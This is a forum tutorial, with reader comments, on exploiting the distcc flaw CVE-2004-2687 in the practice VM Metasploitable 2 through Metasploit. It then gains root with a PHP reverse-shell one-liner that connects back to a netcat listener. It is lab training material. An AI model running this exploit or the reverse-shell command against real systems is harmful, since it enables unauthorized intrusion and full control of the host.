How To: Hack Metasploitable 2 Including Privilege Escalation

Hack Metasploitable 2 Including Privilege Escalation

This guide is written for anyone who is practicing his penetration skills using the Metasploitable 2. The problem that we are facing here is that we have to penetrate to Metasploitable 2 and when this happens we understand that we are not logged in as root but as a user with less privileges!

Step 1: Start the Metasploitable 2

We have to start the Metasploitable 2 (I suppose that the reader is able to do it without a guide) and record the IP. For our example the IP of Metasploitable 2 is "". The attackers IP is "" for this example.

Step 2: Start the Metasploit

  • First, we have to start the PostgreSQL service (service postgresql start).
  • Then we are ready to start the Metasploit framework(msfconsole).

Step 3: Let the Penetration Begins

One of the Metasploitable's security issues is Exploit CVE 2004-2687.

Go to the Metasploit's console and search for distcc (search distcc)

Image via

Now we are ready to use the exploit and set the values we want for the RHOST, PAYLOAD and LHOST options.

Image via
Image via
Image via
Image via

Now we are going to run the simple exploit command to exploit (exploit) the target.

Image via

The target is ours or almost ours?! Let's see who am I (whoami)!

Image via

After all these commands I am a simple deamon! I want the root privilege so much...

Step 4: Privilege Escalation 1/2

Now press Ctrl+C to terminate the current connection to the target!

Image via

Now exploit the target and send the job to the background (exploit -j)

Image via

But what? Wait a sec! It is not going to the background! It is waiting for an input. At this moment you are able to run just one command as root. A single line is separating you from root privileges! If you don't believe me run the whoami command and you will see! But do not run this if this is your first time reading this tutorial.

At this point I should be clever. What do I want to run as root? Of course a reverse shell to my computer. So, let's start the server!

Step 5: Run a Netcat Server

Start a new terminal window and run netcat -lvp 5555. Make sure that you are not running any service at 5555 port. If you do just pick your own port number!

Image via

Now, the server is running and waiting for a connection!

Step 6: Privilege Escalation 2/2

Now we are back to the other terminal window, Metasploit.

A lot of people would run a reverse shell using the netcat. But let's say that you have no netcat available at the server, what are you going to do? Even the Metasploitable is some kind of server. Open your browser at the Metasploitable's IP and you will see! You will see that you have phpMyAdmin! So, we are going to create a reverse shell using php.

Without more ado, go to the Metasploit terminal and run the command: php -r '$sock=fsockopen("",5555);exec("/bin/sh -i <&3 >&3 2>&3");'

Image via

After this, go the other terminal. Yes, the one with the netcat which is waiting! Something nice happened over there...

Image via

Can you see that symbol (#). It is my favorite! You are logged in as root! If you don't believe me then ask your target whoami!

Who needs the CVE 2009-1185 if you can do it without it! Maybe in the next tutorial I will use it!

If you want to try more reverse shells see here!

Be well and use Metasploitable only!


very good post and fantastic read. Thanks!

can you explain what this means? <&3 >&3 2>&3

They are file descriptors!
<&3: Read from file descriptor 3 (You can create you own file descriptors (3-1024) (I think!)
>&3 similar with 1>&3: Send everything from STDOUT (1) to file descriptor 3
2>&3: Send everything from STDERR (2) to file descriptor 3.

If I understand it correctly you are using them just to view to the console its output. Remove >&3 from the command and execute it and at the netcat terminal run the whoami command and see if you are getting anything back.

Here you can find some redirection examples. I hope it helps, because I am not feeling that confident to explain more! Feel free to share your results and, why not, you could write an article and explain more! I would like to read it!

Awesome! Just what basic hackers need. Probably you should make guides in other topics too.


The article is not good sorry. If we look at the netcat connection, you are root on your kali. She connects to herself

First of all, I am a "He" and as a result I am "himself".
Second, I use a vulnerable virtual machine.
Third, netcat waits for a connection.

So from my machine, I "command" the vulnerable virtual machine to connect to my machine. This is how reverse shell works.

Share Your Thoughts

  • Hot
  • Latest